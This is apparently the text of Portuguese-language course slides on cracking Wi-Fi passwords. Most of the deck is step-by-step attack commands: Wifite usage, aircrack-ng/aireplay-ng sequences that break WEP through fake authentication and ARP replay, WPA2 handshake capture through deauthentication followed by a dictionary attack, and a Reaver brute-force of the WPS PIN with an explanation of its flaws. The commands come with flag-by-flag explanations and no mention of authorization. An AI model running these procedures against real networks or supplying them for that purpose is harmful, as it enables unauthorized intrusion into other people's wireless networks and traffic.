O que temos para hoje?
[Link]
Menu do dia:
Redes Wireless
Ataques: Material necessário
Ferramentas mais utilizadas
Wifite: Script automatizado
Wifite: Quebrando senhas com Script
Aircrack: Quebrando WEP em minutos
Aircrack: Quebrando WPA2
Conhecendo a tecnologia WPS
WPS e suas falhas
Quebrando WPS
Redes Wireless
[Link]
Ataques: Material necessário
[Link]
Material necessário
1 Máquina com o Kali Linux (Física ou Virtual)
1 Adaptador Wifi USB
Ferramentas mais utilizadas
[Link]
Existem dezenas de ferramentas com capacidade para quebrar Senhas Wireless,
porém, mencionamos as mais conhecidas abaixo:
Ferramentas para Ataques Wifi
Wifite – Linux
Aircrack – Windows, Android e Linux
coWPAty – Linux
Wifite: Script automatizado
[Link]
Colocando em prática - Wifite
# Baixando WIFITE
wget -O [Link] [Link]
# Setando Permissões
chmod +x [Link]
# Verificando opções
./[Link] –help
# Carregando Wifite
./[Link]
Pressione CTRL+C quando encontrar a rede desejada.
Caso necessite de um ataque usando dicionário
./[Link] -all --dict /pentest/passwords/wordlists/[Link]
Craquear todos os WEPs acima de 50dB, gastando 15 minutos para captura de
pacotes e transmitindo 600 pacotes por segundo.
./[Link] --power 50 -wepw 15 -pps 600
Wifite: Script automatizado
[Link]
Sucess!
Conhecendo Aircrack
[Link]
Aircrack
Quebrando WEP
[Link]
Quebrando WEP
Quebrando WEP em minutos
[Link]
# Ativa o modo de monitoramento da placa de rede
airmon-ng start wlan0
# Coleta informações sobre as redes Wifis disponíveis
airodump-ng mon0
# Gera um arquivo chamado captura para armazenar os dados obtidos.
airodump-ng -w captura --bssid 00:23:CD:F7:F1:56 -c 6 mon0
-w = gera um arquivo
--bssid = ID do AccessPoint Alvo
-c = Canal
mon0 = dispositivo de captura
Quebrando WEP em minutos
[Link]
Em outro terminal....
# Enviar um pedido de falsa autenticação com um mac associado ao access point
que queremos quebrar a senha
aireplay-ng -1 0 –e blackhat -a 00:23:CD:F7:F1:56 -h 70:F1:A1:DB:62:C8 mon0
--d-1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
0 = Aqui temos o tempo para reassociação, em segundos
-e = ESSID do alvo, ou seja, o nome do access point
-a = Mac-Address do Access Point alvo
-h = Mac-Address de alguém que esteja conectado (associado) ao access Point
mon0 = interface de rede em modo promiscuo.
Quebrando WEP em minutos
[Link]
Em outro terminal....
# Acelerando o Processo!!! Enviando Arp request para a rede
aireplay-ng -3 -b 00:23:CD:F7:F1:56 -h 70:F1:A1:DB:62:C8 mon0
-3 = Opção para arp request;
-b = Mac-Address do Access Point alvo
-h = Mac-Address associado ao access Point, no nosso caso o mac que
identificamos como conectado ao AP rede-segura
mon0 = interface de rede em modo promiscuo.
Quebrando WEP em minutos
[Link]
Depois de coletar mais de 10 mil IVS....
# Quebrar o WEP com o arquivo que criamos
aircrack [Link]
Quebrando WPA2
[Link]
Quebrando WPA2
Quebrando WPA2
[Link]
# Ativa o modo de monitoramento da placa de rede
airmon-ng start wlan0
# Coleta informações sobre as redes Wifis disponíveis
airodump-ng mon0
# Gera um arquivo chamado captura para armazenar os dados obtidos.
airodump-ng -w captura-WPA2 --bssid 00:23:CD:F7:F1:56 -c 6 mon0
-w = gera um arquivo
--bssid = ID do AccessPoint Alvo
-c = Canal
mon0 = dispositivo de captura
Quebrando WPA2
[Link]
Em outro terminal....
# Enviar um pedido de falsa autenticação com um mac associado ao acces point que
queremos quebrar a senha
aireplay-ng --deauth 1 -a 00:23:CD:F7:F1:56 -c 70:F1:A1:DB:62:C8 mon0
--deauth = count : deauthenticate 1 ou todas estações (-0)
-a = Mac-Address do Access Point alvo
-c = Mac-Address de alguém que esteja conectado (associado) ao access Point
mon0 = interface de rede em modo promiscuo.
Quebrando WPA2
[Link]
Depois de coletar mais de alguns IVS....
# Quebrar o WPA2 com o arquivo que criamos
aircrack [Link] –w /tmp/wordlist
Tecnologia WPS
[Link]
Quebrando WPS
Entendendo WPS
[Link]
O WPS permite a configuração facilitada da rede sem fio: basta apertar um botão no
roteador ou digitar uma senha numérica (PIN) de até oito dígitos.
Existem dois problemas.
1. O primeiro é que quando um computador tenta utilizar um código PIN errado, o
roteador da conexão sem fio envia uma resposta conhecida como “EAP-NACK”. A
partir dessa resposta, é possível saber se os primeiros quatro dígitos, dos oito,
estão corretos. Dos quatro dígitos finais, um deles é um dígito verificador, que
pode ser calculado, restando apenas três para serem adivinhados.
Apenas 11 mil tentativas são necessárias para descobrir o código.
2. O segundo problema é que os roteadores não limitam o número de tentativas
erradas de um código PIN. Por esse motivo, um atacante pode ficar tentando
códigos até acertar.
Quebrando WPS
[Link]
# Criar modo monitoramento
airmon-ng start wlan0
# Varrer as redes em busca de WPS
airodump-ng mon0
# Executar Reaver para efetuar brute force no AP
reaver –i mon0 –b BSSID –v
Obs.: Este processo deve levar até 10h
Chega por hoje
[Link]
[Link]
E-mail: [Link]@[Link]
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: [Link]/academiahacker